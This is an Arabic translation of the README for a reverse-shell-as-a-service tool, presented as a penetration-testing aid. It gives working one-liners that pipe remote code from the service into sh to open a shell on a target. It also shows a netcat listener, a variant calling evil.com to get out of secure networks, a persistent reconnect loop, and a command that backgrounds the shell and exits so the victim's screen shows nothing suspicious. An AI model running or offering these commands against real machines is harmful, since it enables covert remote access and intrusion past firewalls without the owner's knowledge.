
خدمة شل عكسية عند الطلب تكتشف تلقائيًا بيئة الهدف وتنفذ الحمولة المناسبة للوصول عن بُعد أثناء اختبارات الاختراق.
خدمة الصدفة العكسية (Reverse Shell) كخدمة - https://reverse-shell.sh
صدفة عكسية سهلة التذكر تعمل على معظم الأنظمة الشبيهة بيونكس.
يكتشف البرامج المتاحة على الهدف ويشغّل حمولة مناسبة.
على جهازك، افتح منفذاً واستمع عليه. يمكنك فعل هذا بسهولة باستخدام netcat.
nc -l 1337
على الجهاز الهدف، قم بتوجيه مخرجات https://reverse-shell.sh/yourip:port إلى sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
عد إلى جهازك، يجب أن ترى الآن موجه أوامر (shell prompt).
هذه الأداة مخصصة لاختبار الاختراق (pentesting) أو مساعدة الزملاء في فهم لماذا يجب عليهم دائماً قفل أجهزتهم. من فضلك لا تستخدمها لأي شيء خبيث.
يمكنك استخدام اسم مضيف بدلاً من عنوان IP.
curl https://reverse-shell.sh/localhost:1337 | sh
لأن هذا اتصال عكسي، يمكنه اختراق جدران الحماية والاتصال بالإنترنت.
يمكنك الاستماع للاتصالات على خادم على evil.com والحصول على صدفة عكسية من داخل شبكة آمنة باستخدام:
curl https://reverse-shell.sh/evil.com:1337 | sh
افتراضياً، عند خروج الصدفة تفقد اتصالك. قد يحدث هذا عن طريق الخطأ بأمر غير صالح. يمكنك بسهولة إنشاء صدفة تحاول إعادة الاتصال عن طريق لفها في حلقة while.
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
كن حذراً إذا فعلت هذا مع زميل، فإذا غادر المكتب مع استمرار تشغيلها فأنت تعرضه للهجوم.
يجب إبقاء جلسة الطرفية مفتوحة للحفاظ على اتصال الصدفة العكسية. قد يكون ذلك مكشوفاً بعض الشيء إذا كنت تحاول مخادعة الزملاء.
الأمر التالي سيشغّل الصدفة العكسية في عملية خلفية ويخرج من الطرفية، تاركاً لا نوافذ طرفية مشبوهة مفتوحة على جهاز الضحية.
تأكد من تشغيل هذا في نافذة طرفية جديدة وإلا ستفقد أي عمل في جلستك الحالية.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs